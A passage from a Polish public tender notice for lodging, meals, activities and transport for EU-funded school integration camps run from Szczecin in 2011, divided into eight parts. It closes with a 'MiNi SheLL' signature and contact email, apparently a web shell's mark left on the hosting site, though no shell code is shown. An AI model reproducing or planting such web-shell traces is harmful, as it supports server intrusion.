 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej grupy (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć ).
 - Udostępnienie co najmniej Sali warsztatowej z dostępem do rzutnika, flipchartu - 6 godzin dziennie dla każdej grupy językowej (1 grupa). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali komputerowej z 10-15 komputerami dla uczniów plus komputer dla prowadzącego na 6 godzin dziennie dla każdej grupy informatycznej (1 grupa). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali gimnastycznej zamiennie z basenem wraz ze sprzętem sportowym (piłki, siatki, znaczniki, magnetofon) na 6 godzin dziennie dla każdej grupy sportowej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornik telewizyjny w każdym pokoju.
 - Monitoring obiektu obejmujący co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci).
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego (w pokoju jednoosobowym) wraz z wyżywieniem dla osoby wizytującej obóz przez cały okres jego trwania.
 - Zakwaterowanie 60 uczniów oraz 8 opiekunów w czasie od 21 lutego 2011 roku do 25 lutego 2011 roku.
 - Transport uczestników na trasie szkoła-ośrodek-szkoła:
 - transport uczniów wraz z opiekunami ze szkoły w Barlinku (grupa językowa oraz grupa sportowa - 30 uczniów oraz 4 opiekunów);
 - transport uczniów ze szkoły w Brojcach (grupa informatyczna - 15 uczniów oraz 2 nauczycieli);
 - transport uczniów ze szkoły w Siemyślu (grupa sportowa - 15 uczniów oraz 2 opiekunów);.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek w rozumieniu zamawiającego spełni Wykonawca, który wykaże się doświadczeniem w wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług, odpowiadających swoim rodzajem i wartością usługom, stanowiącym przedmiot zamówienia. Za usługi odpowiadające swoim rodzajem i wartością usługom, stanowiącym przedmiot zamówienia uważa się usługi zgodnie z przedmiotem zamówienia (zapewnienie noclegów, wyżywienia organizacja atrakcji rozrywkowo-kulturalnych), o wartości nie niższej niż 3000 zł brutto każda. Wykonawca w zakresie spełniania warunków udziału w postępowaniu może polegać na wiedzy i doświadczeniu innych podmiotów
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana w oparciu o analizę oświadczeń i dokumentów załączonych do oferty wg formuły spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z załącznikiem 
nr 2 do SIWZ. W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną lub upoważniony przez mocodawcę pełnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Czas wolny - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zcdn.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorskie Centrum Doskonalenia Nauczycieli 
70-236 Szczecin, ul. Gen. J. Sowińskiego 68 , pok. 224- Biuro Projektu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2011 godzina 15:30, miejsce: Zachodniopomorskie Centrum Doskonalenia Nauczycieli 
70-236 Szczecin, ul. Gen. J. Sowińskiego 68 , pok. 224- Biuro Projektu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki: Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Czas wolny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. czas wolny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. czas wolny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. czas wolny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. czas wolny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. czas wolny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. czas wolny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 55.24.30.00-5, 55.25.00.00-7, 92.00.00.00-1, 60.10.00.00-9, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. czas wolny - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com